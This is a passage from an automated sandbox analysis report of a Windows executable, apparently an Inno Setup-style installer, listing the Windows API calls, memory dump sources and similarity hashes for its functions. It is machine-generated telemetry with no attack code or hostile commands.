• FindNextFileA.KERNEL32(000000FF,?,00000000,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B50
• FindClose.KERNEL32(000000FF,00462B77,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B6A
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
• Instruction ID: 0f193a6fcf1d943c675bf75123405c31ceeb2ecab595186adb6c93933d2a98b0
• Opcode Fuzzy Hash: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
• Instruction Fuzzy Hash: 7121D871904B087EDB11DF65CC51ADEBBACDB49704F5084F7E808E31A1E6BCAE44CA5A
APIs
• IsIconic.USER32(?), ref: 004241F4
• SetActiveWindow.USER32(?,?,?,0046CFFB), ref: 00424201
  • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
  • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021525AC,0042421A,?,?,?,0046CFFB), ref: 00423B5F
• SetFocus.USER32(00000000,?,?,?,0046CFFB), ref: 0042422E
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Window$ActiveFocusIconicShow
• String ID:
• API String ID: 649377781-0
• Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
• Instruction ID: 85e094fd83fda52d6ba69bb43f194f943737e29f022f28d5c3d7585fd8a6de7d
• Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
• Instruction Fuzzy Hash: ECF03A717001208BDB10EFAAA8C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
APIs
• IsIconic.USER32(?), ref: 00417D1F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID:
• API String ID: 568898626-0
• Opcode ID: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
• Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
• Opcode Fuzzy Hash: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
• Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
APIs
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: CaptureIconic
• String ID:
• API String ID: 2277910766-0
• Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
• Instruction ID: edcb67aebd7cb7e0e4c3241a821d6ac110e093164443c601d5aebb18a23c44a8
• Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
• Instruction Fuzzy Hash: A2F04F32304A028BDB21A72EC885AEB62F5DF84368B14443FE415CB765EB7CDCD58758
APIs
• IsIconic.USER32(?), ref: 004241AB
  • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
  • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
  • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
  • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
• SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
  • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Window$ActiveEnumIconicLongShowWindows
• String ID:
• API String ID: 2671590913-0
• Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
• Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
• Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
• Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                                                • Instruction ID: 2af12fea25256c3ae9471bae8fd4feed52cec15eb5e351c91de8273fd3ce68b3
                                                                                • Opcode Fuzzy Hash: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                                                • Instruction Fuzzy Hash: 055106316082058FD710DB6AD681A9BF3E5FF98304B2482BBD814C7392D7B8EDA1C759
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478B2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                                                • Instruction ID: 518aae51b6d6b411e39a58dd47dc5b2362a2c83c3bfed1ee6c3543fdde473bb3
                                                                                • Opcode Fuzzy Hash: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                                                • Instruction Fuzzy Hash: 04413775644104DFCB10CF99C6898AAB7F5FB48310B74CA9AE848DB705DB38EE41DB54
                                                                                APIs
                                                                                • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D5AB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CryptFour
                                                                                • API String ID: 2153018856-0
                                                                                • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                                • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                                                • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                                • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                                                APIs
                                                                                • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DDBC,?,0046DF9D), ref: 0045D5BE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CryptFour
                                                                                • API String ID: 2153018856-0
                                                                                • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                                • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                                                • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                                • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3339656027.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000002.00000002.3339633117.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                • Associated: 00000002.00000002.3339680534.0000000010002000.00000002.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_10000000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3339656027.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000002.00000002.3339633117.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                • Associated: 00000002.00000002.3339680534.0000000010002000.00000002.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_10000000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                APIs
                                                                                  • Part of subcall function 0044B614: GetVersionExA.KERNEL32(00000094), ref: 0044B631
                                                                                • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                                • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                                • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                                • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7D9
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7EB
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7FD
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B80F
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B821
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B833
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B845
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B857
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B869
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B87B
                                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B88D
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B89F
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8B1
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8C3
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8D5
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8E7
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8F9
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B90B
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B91D
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B92F
                                                                                • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B941
                                                                                • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B953
                                                                                • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B965
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B977
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B989
                                                                                • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B99B
                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B9AD
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9BF
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9D1
                                                                                • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadVersion
                                                                                • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                • API String ID: 1968650500-2910565190
                                                                                • Opcode ID: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                                                • Instruction ID: 346aa6b979044c2d6f95573bc57da9b6801dc261a15d858c7a91061cf3dc2738
                                                                                • Opcode Fuzzy Hash: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                                                • Instruction Fuzzy Hash: CC91E7B0A40B50EBEF00EBF5ADC6A2637A8EB15B14714467BB444EF295D778D800CF99
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00499B18,00000001,00000000,00000000,004584B9,?,?,?,00000001,?,004586D3,00000000,004586E9,?,00000000,0049B628), ref: 004581D1
                                                                                • CreateFileMappingA.KERNEL32(000000FF,00499B18,00000004,00000000,00002018,00000000), ref: 00458209
                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9,?,?,?), ref: 00458230
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045833D
                                                                                • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9), ref: 00458295
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                • CloseHandle.KERNEL32(004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458354
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045838D
                                                                                • GetLastError.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045839F
                                                                                • UnmapViewOfFile.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458471
                                                                                • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458480
                                                                                • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458489
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                • API String ID: 4012871263-351310198
                                                                                • Opcode ID: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                                                • Instruction ID: 29107a7cf73729034b65a1fcaaf08eab05738b19563c620e852bf3134b102344
                                                                                • Opcode Fuzzy Hash: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                                                • Instruction Fuzzy Hash: 46914170A002099BDB10EFA9C845B9EB7B4EB05305F50856FED14FB283DF7899498F69
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                                • 73EA4C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                                • 73EA6180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                                • 73EA4C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                                • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                • 73EA4C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                • 73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                                • 73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                                • 73E98830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                                • 73E922A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                • 73EA4D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                  • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Similarity
                                                                                • API ID: Color$ObjectSelect$E922E98830Text$A570A6180DeleteFillRect
                                                                                • String ID:
                                                                                • API String ID: 1952589944-0
